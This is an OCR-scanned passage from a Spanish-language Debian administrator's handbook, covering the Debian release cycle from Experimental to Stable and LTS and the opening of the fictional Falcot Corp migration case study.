aspecto  y  solo  proveen  un  instalador  mas  limitado  (generalmente  solo  para  las  arquitecturas 
i386  y  amd64)  pero  mas  amigable  al  usuario  no  iniciado.  Por  el  otro  lado,  generalmente  evitan 
desviarse  demasiado  en  el  contenido  de  los  paquetes  para  poder  beneficiarse  lo  mayor  posible 
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del  amplio  rango  de  software  ofrecido  sin  causar  problemas  de  compatibilidad. 


1.5.2.  La  biblioteca  del  software 

Cuantitativamente,  Debian  es  el  li'der  sin  duda  en  este  aspecto  con  mas  de  21.000  paquetes  fuen- 
te.  Cualitativamente,  la  normativa  de  Debian  y  el  largo  perfodo  de  prueba  antes  de  lanzar  una 
nueva  version  estable  justifica  su  reputacion  de  estabilidad  y  consistencia.  En  cuanto  a  la  dis- 
ponibilidad,  todo  esta  disponible  online  a  traves  de  numerosas  replicas  en  todo  el  mundo  que 
actualizan  cada  seis  horas. 

Muchos  comerciantes  venden  CDROMs  por  internet  a  un  precio  muy  bajo  (generalmente  al  cos- 
to),  cuyas  «imagenes»  estan  disponibles  para  ser  descagadas  libremente.  Solo  hay  un  inconve- 
niente:  la  baja  frecuencia  de  publicacion  de  nuevas  versiones  estables  (su  desarrollo  a  veces 
toma  mas  de  dos  anos),  que  demora  la  inclusion  de  software  nuevo. 

La  mayoria  de  los  nuevos  programas  libres  ingresan  rapidamente  a  la  version  de  desarrollo  que 
les  permite  ser  instalados.  Si  esto  necesita  de  demasiadas  actualizaciones  debido  a  sus  dependen¬ 
ces,  el  programa  puede  ser  recompilado  para  la  version  estable  de  Debian  (revise  el  Capitulo  15: 
«Creacion  de  un  paquete  Debian»  pagina  446  para  mas  informacion  sobre  este  tema). 


1.6.  Ciclo  de  vida  de  una  version 

El  proyecto  tendra  de  tres  a  seis  versiones  diferentes  de  cada  programa  simultaneamente,  llama- 
das  «Experimental»  (experimental),  «Unstable»  (inestable),  «Testing»  (pruebas),  «Stable»  (estable), 
Oldstable  (antigua  estable)  e  incluso  Oldoldstable  (antigua  «Oldstable»).  Cada  una  de  las  correspon- 
de  a  una  fase  diferente  en  el  desarrollo.  Para  entender  mejor,  veamos  la  travesia  de  un  programa 
desde  su  empaquetado  inicial  hasta  su  inclusion  en  una  version  estable  de  Debian. 


VOCABULARIO  El  termino  «release»  en  el  proyecto  Debian  indica  una  version  particular  de  la  dis- 
Version  («release»)  tribucion.  Tambien  hace  referencia  al  anuncio  publico  del  lanzamiento  de  cualquier 
nueva  version  (estable). 


1.6.1  El  estado  experimental:  Experimental 

Primero  revisemos  el  caso  particular  de  la  distribucion  Experimental:  este  es  un  grupo  de  paque¬ 
tes  Debian  que  corresponde  a  software  que  esta  actualmente  en  desarrollo  y  no  necesariamente 
completado,  explicando  su  nombre.  No  todo  pasa  por  este  paso,  algunos  desarrolladores  agre- 
gan  paquetes  aqui  para  recibir  comentarios  y  sugerencias  de  usuarios  mas  experimentados  (y 
valientes). 

De  lo  contrario,  esta  distribucion  generalmente  alberga  modificaciones  importantes  a  paquetes 
base,  cuya  integracion  a  Unstable  con  errores  serios  tendria  repercusiones  criticas.  Es,  por  lo  tan- 
to,  una  distribucion  completamente  aislada,  sus  paquetes  nunca  migran  a  otra  version  (excepto 
intervencion  directa  y  expresa  de  su  responsable  o  los  ftpmaster).  Ademas,  no  es  autocontenida: 
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solo  un  subconjunto  de  los  paquetes  existentes  estan  presentes  en  Experimental  y  generalmente 
no  incluye  el  sistema  base.  Por  lo  tanto,  esta  distribucion  es  mas  util  combinada  con  otra  distri¬ 
bucion  autocontenida,  como  Unstable. 


1.6. 2.  El  estado  inestable:  Unstable 


Volvamos  al  caso  tipico  de  un  paquete.  Su  responsable  crea  un  paquete  inicial  que  compila  para 
la  version  Unstable  y  la  ubica  en  el  servidor  ftp-master.debian.org.  Este  primer  evento  involucra 
una  inspeccion  y  validacion  de  parte  de  los  ftpmaster.  El  software  luego  esta  disponible  en  la 
distribucion  Unstable,  la  «cresta  de  la  ola»  elegida  por  los  usuarios  que  prefieren  paquetes  mas 
actualizados  en  lugar  de  menos  errores.  Elios  descubren  el  programa  y  lo  prueban. 

Si  encuentran  errores  los  reportan  al  encargado  del  paquete.  Quien  prepara  versiones  corregi- 
das  regularmente  que  vuelve  a  subir  al  servidor. 

Cada  nuevo  paquete  actualizado  es  actualizado  en  todas  las  replicas  de  Debian  en  todo  el  mundo 
en  seis  horas.  Los  usuarios  prueban  las  correcciones  y  buscan  otros  problemas  que  resulten  de 
las  modificaciones.  Pueden  ocurrir  varias  modificaciones  rapidamente.  Durante  esos  momentos, 
los  robots  de  compilacion  automatica  («autobuilder»)  entran  en  accion.  Mas  frecuentemente,  el 
desarrollador  solo  tiene  una  PC  tradicional  y  compilo  sus  paquetes  en  la  arquitectura  amd64  (o 
i386);  los  «autobuilder»  se  encargan  de  compilar  versiones  para  todas  las  otras  arquitecturas. 
Algunas  compilaciones  pueden  fallar,  el  mantenedor  recibira  un  reporte  de  error  indicando  el 
problema,  que  es  corregido  en  las  siguientes  versiones.  Cuando  un  especialista  de  esa  arquitec¬ 
tura  descubre  el  error,  el  reporte  puede  llegar  con  un  parche  ya  listo  para  utilizar. 


VISTA  RAPIDA  buildd  es  la  abreviacion  de  demonio  de  compilacion  («build  daemon»).  Este  pro- 

buitdd'  el  recompilador  grama  recompila  automaticamente  nuevas  versiones  de  paquetes  Debian  en  las  ar- 

de  paquetes  Debian  quitecturas  en  las  que  se  encuentra  (se  evita  la  compilacion  cruzada  en  la  medida 
de  lo  posible). 

Por  lo  tanto,  para  generar  binarios  para  la  arquitectura  arm64,  el  proyecto  tiene 
disponibles  maquinas  arm64.  El  programa  buiidd  se  ejecuta  en  ellas  de  forma  con- 
tinua  y  crea  paquetes  binarios  para  arm64  desde  los  paquetes  fuente  enviados  por 
los  desarrolladores  Debian. 

Este  software  es  utilizado  en  todos  los  equipos  que  sirven  como  autobuilders  pa¬ 
ra  Debian.  Por  extension,  se  suele  utilizar  el  termino  buiidd  para  referirse  a  estas 
maquinas,  que  generalmente  estan  reservadas  solo  para  este  proposito. 
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Desarrollador  de  Debian 


Figura  1.2  Compilation  de  un  paquete  por  los  autobuilders 


1.6.3.  Migracion  a  Testing 

Luego,  el  paquete  habra  madurado;  compilado  en  todas  las  arquitecturas,  y  no  tendra  modifica- 
ciones  recientes.  Sera  entonces  candidato  para  ser  incluido  en  la  distribucion  de  pruebas:  Testing 
—  un  grupo  de  paquetes  de  Unstable  elegidos  segun  un  criterio  cuantificable.  Todos  los  di'as,  un 
programa  selecciona  los  paquetes  a  incluir  en  Testing  segun  elementos  que  garanticen  cierto 
nivel  de  calidad: 

1.  falta  de  fallos  crfticos  o,  al  menos,  menor  cantidad  que  la  version  incluida  ya  en  Testing; 

2.  al  menos  10  dfas  en  Unstable,  que  es  suficiente  tiempo  para  encontrar  y  reportar  problemas 
serios; 

3.  compilacion  satisfactoria  en  todas  las  arquitecturas  oficiales; 

4.  dependencias  que  puedan  ser  satisfechas  en  Testing  o  que,  por  lo  menos,  puedan  moverse 
allfjunto  al  paquete  en  cuestion. 
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Este  sistema  no  es  infalible;  se  encuentran  regularmente  errores  crfticos  en  los  paquetes  inclui- 
dos  en  Testing.  Aun  asf,  generalmente  es  efectivo  y  Testing  tiene  muchos  menos  problemas  que 
Unstable,  convirtiendola  para  muchos  en  un  buen  compromiso  entre  estabilidad  y  novedad. 


NOTA  Si  bien  es  muy  interesante  en  principio,  Testing  posee  algunos  problemas  practicos: 

Limitaciones  de  Testing  maraba  de  dependencias  entre  paquetes  es  tal  que  rara  vez  un  paquete  puede 

moverse  alii  completamente  por  su  cuenta.  Con  los  paquetes  que  dependen  unos 
de  otros,  a  veces  es  necesario  migrar  una  gran  cantidad  de  paquetes  simultanea- 
mente,  lo  cual  es  imposible  cuando  algunos  son  actualizados  frecuentemente.  Por 
otro  lado,  el  script  que  identifica  las  familias  de  paquetes  relacionados  trabaja  duro 
para  crearlas  (esto  seria  un  problema  NP-completo  para  el  cual,  afortunadamente, 
conocemos  algunas  buenas  heuristicas).  Es  por  eso  que  podemos  interactuar  ma- 
nualmente  y  guiar  a  este  script  sugiriendo  grupos  de  paquetes  o  imponiendo  la 
inclusion  de  ciertos  paquetes  en  un  grupo  aun  cuando  esto  rompa  temporalmen- 
te  algunas  dependencias.  Esta  funcionalidad  es  accesible  a  los  administradores  de 
version  («Release  Managers*)  y  sus  asistentes. 

Recuerde  que  un  problema  NP-completo  es  de  una  complejidad  algoritmica  expo- 
nencial  segun  el  tamano  de  los  datos,  que  son  aqui  la  longitud  del  codigo  (can¬ 
tidad  de  lineas)  y  los  elementos  involucrados.  Frecuentemente,  la  unica  forma  de 
resolverlo  es  examinar  todas  las  configuraciones  posibles,  que  requeriria  cantidades 
enormes  de  recursos.  Una  heuristica  es  una  solucion  aproximada  pero  satisfactoria. 


COMUNIDAD  El  gestor  de  versiones  («Release  Manager*)  es  un  titulo  importante  asociado  a  pesa- 
El  gestor  de  versiones  das  resPonsabilidades.  El  portador  de  este  titulo  debe,  en  efecto,  gestionar  la  publi- 
(« Release  Manager*)  cacion  de  una  version  nueva  y  estable  de  Debian  y  definir  el  proceso  de  desarrollo 
de  Testing  hasta  que  cumpla  los  criterios  de  calidad  para  Stable.  Tambien  define 
un  cronograma  tentativo  (que  no  siempre  se  cumple). 

Tambien  tenemos  gestores  de  version  estable,  generalmente  abreviados  SRM  («Sta- 
ble  Release  Managers*),  quienes  se  encargan  de  seleccionar  actualizaciones  para  la 
version  estable  actual  de  Debian.  Elios  sistematicamente  incluyen  parches  de  segu- 
ridad  y  examinan  todas  las  otras  propuestas  de  inclusion,  caso  por  caso,  enviadas 
por  desarrolladores  Debian  ansiosos  de  actualizar  su  paquete  en  la  version  estable. 


1.6.4.  La  promocion  desde  Testing  a  Stable 

Supongamos  ahora  que  nuestro  paquete  se  incluye  en  Testing.  Mientras  tenga  margen  de  mejora, 
el  responsable  del  mismo  debe  continuar  mejorando  y  volver  a  inicar  el  proceso  desde  Unstable 
(aunque  generalmente  su  posterior  inclusion  en  Testing  sera  mas  rapida:  a  menos  que  haya  cam- 
biado  significativamente  todas  sus  dependencias  ya  se  encuentran  disponibles).  El  desarrollador 
completa  su  trabajo  cuando  alcanza  la  perfeccion.  El  siguiente  paso  es  la  inclusion  en  la  distri- 
bucion  Stable  que,  en  realidad,  es  una  simple  copia  de  Testing  en  un  momenta  elegido  por  el 
administrador  de  version.  Lo  ideal  seria  que  esta  decision  se  tome  cuando  este  listo  el  instalador 
y  cuando  no  exista  ningtin  programa  en  Testing  que  tenga  errores  crfticos  conocidos. 

Ya  que  este  momento  nunca  llega  realmente,  en  la  practica  Debian  llega  a  un  compromiso:  eli- 
minar  paquetes  en  los  que  su  encargado  no  corrigio  los  errores  a  tiempo  o  acordar  publicar  una 
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version  con  algunos  errores  en  los  miles  de  programas.  El  gestor  de  versiones  habra  anunciado 
previamente  un  periodo  de  estabilizacion  («freeze»),  durante  el  cual  cada  actualizacion  a  Testing 
debe  ser  aprobado.  El  objetivo  aqui  es  evitar  cualquier  version  nueva  (y  nuevos  errores)  y  solo 
aprobar  correcciones  de  errores. 


Figura  1.3  £/  camino  de  un  paquete  a  traves  de  las  varias  versiones  de  Debian 


VOCABULARIO  Durante  el  periodo  de  estabilizacion  se  bloquea  el  desarrollo  de  la  distribucion  de 
Estabilizacion'  la  recta  Testing,  no  se  permiten  mas  actualizaciones  automaticas.  Solo  los  gestores  de  ver- 
final  s'°n  es^n  autorizados  a  cambiar  los  paquetes  de  acuerdo  a  sus  propios  criterios. 
El  objetivo  es  prevenir  la  aparicion  de  nuevos  errores  mediante  la  introduccion  de 
nuevas  versiones;  las  actualizaciones  que  hayan  sido  analizadas  a  fondo  solo  seran 
autorizadas  cuando  corrijan  errores  significativos. 


Luego  de  la  publicacion  de  una  nueva  version  estable,  el  gestor  de  versiones  estables  se  encarga 
de  todo  el  desarrollo  futuro  (llamados  «revisiones»,  por  ejemplo:  7.1,  7.2,  7.3  para  la  version 
7).  Estas  actualizaciones  incluyen  sistematicamente  todos  los  parches  de  seguridad.  Tambien 
incluiran  las  correcciones  mas  importantes  (el  encargado  de  un  paquete  debera  demostrar  la 
gravedad  del  problema  que  desea  corregir  para  lograr  incluir  sus  actualizaciones). 

Al  final  del  viaje,  nuestro  paquete  hipotetico  ahora  esta  incluido  en  la  distribucion  estable.  Este 
viaje,  con  sus  dificultados,  explica  las  demoras  significativas  que  separan  las  versiones  estables 
de  Debian.  Esto  contribuye,  en  general,  a  su  reputacion  de  calidad.  Lo  que  es  mas,  la  mayoria 
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de  los  usuarios  son  satisfechos  utilizando  una  de  las  tres  distribuciones  disponibles  simultanea- 
mente.  Los  administradores  de  sistemas  no  necesitan  la  ultima y  mejor  version  de  GNOME  preo- 
cupados  por  la  estabilidad  de  sus  servidores  por  sobre  todas  las  cosas;  ellos  pueden  elegir  De- 
bian  Stable  y  estaran  satisfechos.  Los  usuarios  finales,  mas  interesados  en  las  ultimas  versiones 
de  GNOME  o  KDE  que  en  una  estabilidad  solida,  encontraran  en  Debian  Testing  un  buen  com¬ 
promise  entre  la  falta  de  problemas  serios  y  software  relativamente  actualizado.  Finalmente, 
desarrolladores  y  usuarios  mas  experimentados  pueden  liderar  el  camino  probando  todos  los 
ultimos  desarrollos  en  Debian  Unstable  recien  salidos  del  horno,  arriesgandose  a  sufrir  dolores 
de  cabeza  y  errores  inherentes  en  cualquier  nueva  version  de  un  programa.  jA  cada  quien  su 
propio  Debian! 


CULTURA 

GNOME  y  KDE,  los 
entornos  graficos  de 
escritorio 


En  el  mundo  del  software  libre,  los  entornos  graficos  mas  populares  son  GNOME 
(«GNU  Network  Object  Model  Environment*)  y  KDE  («K  Desktop  Environment*). 
Un  entorno  de  escritorio  es  un  conjunto  de  programas  agrupados  para  permitir  una 
facil  gestion  de  las  operaciones  mas  comunes  a  traves  de  un  entorno  grafico.  Gene- 
ralmente  incluyen  un  gestor  de  archivos,  suite  ofimatica,  navegador  web,  programa 
de  email,  accesorios  multimedia,  etc.  La  diferencia  mas  visible  reside  en  la  eleccion 
la  biblioteca  grafica  utilizada:  GNOME  ha  elegido  GTK+  (software  libre  licenciado 
bajo  la  LGPL)  y  KDE  ha  seleccionado  Qt  (un  proyecto  respaldado  por  una  empresa, 
ahora  disponible  bajo  la  licencia  GPL  y  una  licencia  comercial). 


http://www.gnome.org/ 


»•  http://www.kde.org/ 
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Eje  temporal 


Eje  temporal 


Figura  1.4  Camino  cronologico  de  un  programa  empaquetado  por  Debian 
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1.6.5.  El  estado  de  Oldstable  y  Oidoidstabie 


Cada  version  estable  (Stable)  tiene  una  esperanza  de  vida  de  unos  5  anos  y,  dado  que  se  tiende  a 
liberar  una  nueva  version  cada  2  anos,  pueden  haber  hasta  3  versiones  soportadas  en  un  mismo 
momento.  Cuando  se  publica  una  nueva  version,  la  distribucion  predecesora  pasa  a  Oldstable  y 
la  que  lo  era  antes  pasa  a  ser  Oidoidstabie. 

Este  soporte  a  largo  plazo  (LTS)  de  las  vereisones  de  Debian  es  una  iniciativa  reciente:  colabora- 
dores  individuales  y  empresas  han  unido  fuerzas  para  crear  el  equipo  Debian  LTS.  Las  versiones 
antiguas  uqe  ya  no  son  soportadas  por  el  equipo  de  seguridad  de  Debian  pasan  a  ser  responsabi- 
lidad  de  este  nuevo  equipo. 

El  equipo  de  seguridad  de  Debian  maneja  tanto  el  soporte  relativo  a  la  seguridad  para  la  version 
actual  Stable  (estable)  como  para  la  Oldstable  (pero  solo  para  asegurar  un  ano  de  solapamiento 
despues  de  haber  liberado  la  actual  estable).  Esto  lleva  a  ofrecer  soporte  durante  tres  anos  para 
cada  version.  El  equipo  LTS  de  Debian  se  encarga  de  los  (dos)  ultimos  anos  de  soporte  a  la  segu¬ 
ridad  para  que  cada  version  se  beneficie  de  por  lo  menos  5  anos  de  soporte  y  dar  tiempo  a  los 
usuarios  para  que  puedan  actualizar  desde  la  version  N  a  la  N+2. 

https : //wiki .debian . org/LTS 


COMMUNITY 

Empresas  espnsorizando 
el  esfuerzo  de  LTS 
(soporte  a  largo  plazo) 


El  soporte  a  largo  plazo  es  una  meta  dificil  en  Debian  debido  a  que  los  voluntarios 
tienden  a  evitar  este  trabajo  ya  que  no  es  muy  divertido.  Y  proveer  soporte  de  se¬ 
guridad  durante  5  anos  para  software  antiguo  es  —para  muchos  colaboradores— 
menos  divertido  que  empaquetar  las  versiones  que  vendran  o  desarrollar  nuevas 
funcionalidades. 


Para  llevar  a  cabo  este  proyecto,  el  proyecto  conto  con  el  hecho  de  que  el  soporte 
a  largo  plazo  era  particularmente  relevante  par  alas  empresas  y  que  serviria  para 
repartir  de  forma  mutua  el  coste  del  soporte  a  la  seguridad. 

El  proyecto  empezo  en  Junio  de  2014:  algunas  empresas  permitieron  a  sus  emplea- 
dos  colaborar  a  tiempo  particial  al  proyecto  Debian  LTS  mientras  otras  prefirieron 
patrocinar  al  proyecto  con  dinero  para  pagar  a  los  colaboradores  para  que  hicieran 
el  trabajo  que  ellas  no  querian  hacer  de  forma  gratuita.  La  mayoria  de  colaborado¬ 
res  de  Debian  cobraran  para  trabajar  en  LTS  conjuntamente  para  crear  una  oferta 
clara  de  patrocinio  gestionada  por  Freexian  (la  empresa  de  Raphael  Hertzog): 

•*-  http :  //www.  freexian .  com/services/debian-  Its  .  htmt 

El  equipo  LTS  de  Debian  no  esta  preparado  todavia  para  dar  soporte  a  todos  los 
paquetes  de  Debian  dado  que  hay  voluntarios  que  trabajan  en  los  paquetes  de 
los  que  se  encargan  y  otros  que  cobran  por  priorizar  los  paquetes  que  usan  sus 
patrocinadores. 

El  proyecto  siempre  esta  buscando  nuevos  patrocinadores:  ^que  tal  tu  empresa? 
^Puedes  prestar  un  empleado  para  que  trabaje  de  forma  parcial  en  el  equipo  de 
soporte  a  largo  plazo?  ^Puedes  reservar  una  pequena  parte  del  presupuesto  para  el 
soporte  a  la  seguridad? 

https : //wiki .debian . org/LTS/ Funding 
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Palabras  clave 


Falcot  Corp 
PYME 
Gran  crecimiento 
Plan  maestro 
Migracion 
Reducion  de  costos 


Capi'tulo 


Presentation  del  caso 

de  estudio 

Contenidos 
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En  el  contexto  de  este  libro,  es  el  administrador  de  sistemas  de  una  pequena  empresa  en  crecimiento.  En 
colaboracion  con  sus  directores,  llego  el  momento  de  redefinir  el  plan  maestro  de  los  sistemas  de 
information  para  el  proximo  ano.  Eligio  migrar  a  Debian  progresivamente  por  razones  tanto  practicas 
como  economicas.  Veamos  en  detalle  lo  que  le  espera... 


Creamos  este  caso  de  estudio  para  abordar  todos  los  servicios  de  sistemas  de  informacion  moder- 
nos  utilizados  actualmente  en  una  empresa  de  tamano  medio.  Luego  de  leer  este  libro,  tendra 
todos  los  elementos  necesarios  para  instalar  Debian  en  sus  servidores  y  volar  con  sus  propias 
alas.  Tambien  aprendera  donde  y  como  encontrar  informacion  eficientemente  en  los  momentos 
de  dificultad. 


2.1.  Necesidades  de  TI  de  rapido  crecimiento 

Falcot  Corp  es  un  fabricante  de  equipos  de  audio  de  alta  calidad.  La  empresa  esta  creciendo 
fuertemente  y  tiene  dos  filiales,  una  en  Saint-Etienne  y  otra  en  Montpellier.  La  primera  tiene 
alrededor  de  150  empleados  y  alberga  una  fabrica  para  la  manufactura  de  altavoces,  un  labora¬ 
tory  de  diseno  y  una  oficina  administrativa.  La  filial  de  Montpellier,  mas  pequena,  solo  tiene 
cerca  de  50  trabajadores  y  produce  amplificadores. 


NOTA  La  empresa  utilizada  como  ejemplo  aqui,  Falcot  Corp,  es  completamente  ficticia. 
Empresa  fictica  creada  Cualquier  parecido  con  una  compafii'a  existente  es  pura  coincidencia.  De  la  misma 
para  el  caso  de  estudio  forma,  algunos  datos  de  ejemplo  en  este  libro  pueden  ser  ficticios. 


Desde  hace  tiempo  que  el  sistema  informatico  tiene  dificultad  para  seguir  el  ritmo  del  crecimien¬ 
to  de  la  compama,  por  lo  que  ahora  estan  decididos  a  redefinirlo  completamente  para  lograr  los 
objetivos  establecidos  por  la  gerencia: 

■  moderno,  infraestructura  que  pueda  crecer  facilmente; 

■  reducir  los  costos  de  licencias  de  software  gracias  al  uso  de  software  de  codigo  abierto; 

■  la  instalacion  de  un  sitio  web  de  comercio  electronico,  posiblemente  «B2B»  (negocio  a 
negocio,  es  decir:  enlazando  sistemas  de  informacion  de  diferentes  empresas,  como  un 
proveedor  con  sus  clientes); 

■  mejorar  significativamente  la  seguridad  para  proteger  mejor  los  secretos  comerciales  re- 
lacionados  a  productos  nuevos. 

Se  redefinira  todo  el  sistema  de  informacion  con  estos  objetivos  en  mente. 


2.2.  Plan  maestro 

La  gerencia  TI,  con  su  colaboracion,  realizo  un  estudio  un  poco  mas  extensivo  que  identified 
algunas  limitaciones  y  definio  el  plan  para  la  migracion  al  sistema  de  codigo  abierto  elegido: 
Debian. 

Una  de  las  restricciones  significativas  es  que  el  departamento  de  finanzas  utiliza  software  espe- 
cifico  que  solo  ejecuta  en  Microsoft  Windows™.  El  laboratorio,  por  su  cuenta,  utiliza  software  de 
diseno  asistido  que  ejecuta  en  OS  X™. 
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Figura  2.1  Revision  de  la  red  de  Falcot  Corp 


El  cambio  a  Debian  sera  gradual;  no  es  razonable  que  una  pequena  empresa,  con  medios  limi- 
tados,  cambie  todo  de  un  dfa  para  otro.  Para  empezar,  se  debe  entrenar  en  administracion  de 
Debian  al  personal  de  TI.  Despues  se  convertiran  los  servidores  comenzando  con  la  infraestructu- 
ra  de  red  (routers,  firewalls,  etc.),  le  seguiran  los  servicios  para  usuarios  (archivos  compartidos, 
web,  SMTP,  etc.).  Finalmente  se  migraran  gradualmente  a  Debian  los  equipos  de  oficina  y  se 
entrenara  (internamente)  a  cada  departamento  durante  el  despliegue  del  nuevo  sistema. 


2.3.  ^Por  que  una  distribution  GNU/Linux? 


VOLVER  A  LOS  CIMIENTOS  Linux,  como  ya  sabe,  es  solo  el  nucleo.  Las  expresiones  «distribucion  Linux»  y  «sis- 

.  Linux  o  GNU/Linux?  tema  Linux»  son,  por  lo  tanto,  incorrectas;  son,  en  realidad,  sistemas  o  distribucio- 

nes  basados  en  Linux.  Estas  expresiones  no  mencionan  el  software  que  siempre 
completa  al  nucleo,  entre  el  que  estan  los  programas  desarrollados  por  el  proyecto 
GNU.  El  Dr.  Richard  Stallman,  fundador  de  este  proyecto,  insiste  que  se  utilice  sis- 
tematicamente  la  expresion  «GNU/Linux»  para  reconocer  mejor  las  importantes 
contribuciones  realizadas  por  el  proyecto  GNU  y  los  principios  de  libertad  sobre 
los  que  estan  fundados. 

Debian  eligio  seguir  esta  recomendacion  y,  por  lo  tanto,  nombrar  sus  distribuciones 
de  forma  acorde  (la  ultima  version  estable  es  Debian  GNU/Linux  8). 
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Varios  factores  dictaron  esta  eleccion.  El  administrador  del  sistema,  quien  conocfa  esta  distri- 
bucion,  se  aseguro  que  estuviera  en  la  lista  de  posibles  candidatos  para  el  rediseno  del  sistema 
informatico.  Las  complicadas  condiciones  economicas  y  feroz  competencia  en  el  sector  limita- 
ron  el  presupuesto  para  este  proyecto  a  pesar  de  su  importancia  critica  para  el  futuro  de  la 
empresa.  Es  por  esto  que  se  eligieron  rapidamente  soluciones  de  codigo  abierto:  varios  estudios 
recientes  indican  que  son  menos  costosas  que  soluciones  privativas,  a  pesar  que  la  calidad  del 
servicio  es  igual  o  mejor,  siempre  que  haya  disponible  personal  calificado  para  mantenerlo. 


EN  LA  PRACTICA 

Costo  total  de  posesion 
(«TCO:  Total  Cost  of 
Ownership») 


El  costo  total  de  posesion  es  el  total  de  todo  el  dinero  gastado  para  la  posesion  o 
adquisicion  de  un  elemento,  en  este  caso  se  refiere  al  sistema  operativo.  Este  precio 
incluye  todo  precio  de  posibles  licencias,  costos  de  entrenamiento  de  personal  para 
trabajar  con  el  software  nuevo,  reemplazo  de  maquinas  muy  lentas,  reparaciones 
adicionales,  etc.  Se  tiene  en  cuenta  todo  lo  que  surga  directamente  de  la  eleccion 
original. 


Este  TCO,  que  varia  segun  el  criterio  elegido  en  su  estudio,  rara  vez  es  significativo 
en  si  mismo.  Sin  embargo,  es  muy  interesante  comparar  el  TCO  calculado  segun 
las  mismas  reglas  para  diferentes  opciones  siempre.  Esta  tabla  de  valoracion  es  de 
extrema  importancia  y  es  facil  de  manipular  para  obtener  una  conclusion  desea- 
da.  Por  lo  tanto,  el  TCO  de  solo  un  equipo  no  tiene  sentido  ya  que  el  costo  de  un 
administrador  tambien  se  refleja  en  el  numero  total  de  equipos  que  puede  gestio- 
nar,  un  numero  que  depende  obviamente  del  sistema  operativo  y  las  herramientas 
propuestas. 


Entre  los  sistemas  operativos  libres,  el  departamento  de  IT  analizo  sistemas  libres  BSD  (OpenBSD, 
FreeBSD  y  NetBSD),  GNU  Hurd  y  distribuciones  Linux.  GNU  Hurd,  que  no  ha  publicado  una  ver¬ 
sion  estable  aun,  fue  rechazado  inmediatamente.  La  eleccion  entre  BSD  y  Linux  es  mas  sencilla. 
El  primero  tiene  meritos,  especialmente  en  servidores.  El  pragmatismo,  sin  embargo,  dio  lugar  a 
la  eleccion  de  un  sistema  Linux  ya  que  su  base  instalada  y  su  popularidad  son  muy  significativas 
y  tienen  muchas  consecuencias  positivas.  Debido  a  esta  popularidad  es  mas  sencillo  encontrar 
personal  calificado  para  administrar  equipos  Linux  que  tecnicos  con  experiencia  en  BSD.  Ade- 
mas,  las  distribuciones  Linux  se  adaptan  a  nuevo  hardware  mas  rapidamente  que  BSD  (aunque 
frecuentemente  es  una  carrera  muy  pareja).  Por  ultimo,  las  distribuciones  Linux  estan  mejor 
adaptadas  a  interfaces  graficas  amigables  para  el  usuario,  indispensable  para  principiantes  du¬ 
rante  la  migracion  de  todos  los  equipos  de  oficina  al  nuevo  sistema. 


ALTERNATIVA  Desde  Debian  Squeeze ,  es  posible  utilizar  Debian  con  un  nucleo  FreeBSD  en  equi- 
Debian  GNU/kFreeBSD  Pos  ^2  y  64  bits;  esto  es  lo  que  significan  las  arquitecturas  kf  reebsd-i386  y 

kf  reebsd  -amd64.  Si  bien  estas  arquitecturas  no  son  versiones  oficiales  de  arquitec- 
tura  («official  release  architectures*),  alrededor  de  90  %  del  software  empaquetado 
para  Debian  esta  disponible  para  las  mismas. 

Estas  arquitecturas  pueden  ser  una  eleccion  apropiada  para  los  administradores 
de  Falcot  Corp,  especialmente  para  un  firewall  (el  nucleo  es  compatible  con  tres 
diferentes:  IPF,  IPFW  y  PF)  o  para  un  sistema  NAS  (almacenamiento  acoplado  a 
la  red  —  «network  attached  storage*  —  para  el  que  el  sistema  de  archivos  ZFS  fue 
probado  y  aprobado). 
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2.4.  ^Por  que  la  distribucion  Debian? 


Una  vez  que  seleccionada  la  familia  Linux,  se  debe  elegir  una  opcion  mas  especffica.  Nuevamente, 
abundan  los  criterios  a  considerar.  La  distribucion  elegida  debe  poder  funcionar  por  muchos 
anos  ya  que  la  migracion  de  una  a  otra  puede  acarrear  costos  adicionales  (aunque  menores  que 
si  la  migracion  fuera  entre  dos  sistemas  operativos  completamente  distintos  como  Windows  o 
OSX). 

La  estabilidad  es,  entonces,  esencial  y  debe  garantizar  actualizaciones  regulares  y  parches  de 
seguridad  por  varios  anos.  El  ritmo  de  las  actualizaciones  tambien  es  importante  ya  que,  con 
tantos  equipos  para  administrar,  Falcot  Corp  no  puede  realizar  esta  operacion  compleja  muy 
seguido.  El  departamento  IT  insiste,  por  lo  tanto,  ejecutar  la  ultima  version  estable  de  la  distri¬ 
bucion,  que  goza  de  la  mejor  asistencia  tecnicay  parches  de  seguridad  garantizados.  En  efecto, 
las  actualizaciones  de  seguridad  solo  son  garantizadas  por  un  tiempo  limitado  en  las  versiones 
antiguas  de  una  distribucion. 

Finalmente,  por  razones  de  homogeneidad  y  facilidad  de  administracion,  la  misma  distribucion 
debe  ejecutar  en  todos  los  servidores  (algunos  de  los  cuales  son  maquinas  Sparc  que  ejecutan 
Solaris  actualmente)  y  los  equipos  de  oficina. 


2.4.1  Distribuciones  comerciales  y  guiadas  por  la  comunidad 

Existen  dos  categorias  principales  de  distribuciones  Linux:  comerciales  y  guiadas  por  la  comu¬ 
nidad.  Las  primera,  desarrollada  por  empresas,  es  vendida  junto  a  servicios  de  asistencia  comer¬ 
ciales.  Las  ultimas  son  desarrolladas  segun  el  mismo  modelo  de  desarrollo  que  el  software  libre 
del  que  estan  compuestas. 

Una  distribucion  comercial  tendera,  entonces,  a  publicar  nuevas  versiones  mas  frecuentemente 
para  abastecer  mejor  al  mercado  de  actualizaciones  y  servicios  asociados.  Su  futuro  esta  conec- 
tado  directamente  al  exito  comercial  de  su  compama  y  muchas  ya  han  desaparecido  (Caldera 
Linux,  StormLinux,  etc.). 

Una  distribucion  de  la  comunidad  no  sigue  ningun  cronograma  salvo  el  suyo  propio.  Similar  al 
nucleo  Linux,  se  publican  nuevas  versiones  cuando  son  estables,  nunca  antes.  Su  supervivencia 
esta  garantizada  mientras  tenga  suficientes  desarrolladores  individuals  o  empresas  indepen- 
dientes  que  la  apoyen. 

Una  comparacion  de  varias  distribuciones  Linux  llevo  a  elegir  Debian  por  varias  razones: 

■  Es  una  distribucion  comunitaria,  con  desarrollo  asegurado  independientemente  de  cual- 
quier  limitacion  comercial;  sus  objetivos  son,  por  lo  tanto,  de  una  naturaleza  esencialmen- 
te  tecnica  que  parece  favorecer  la  calidad  general  del  producto. 

■  De  todas  las  distribuciones  comunitarias,  es  la  mas  significativa  desde  varias  perspectivas: 
cantidad  de  contribuyentes,  numero  de  paquetes  de  software  disponibles  y  anos  de  exis¬ 
tence  continua.  El  tamano  de  su  comunidad  es  un  testigo  innegable  de  su  continuidad. 
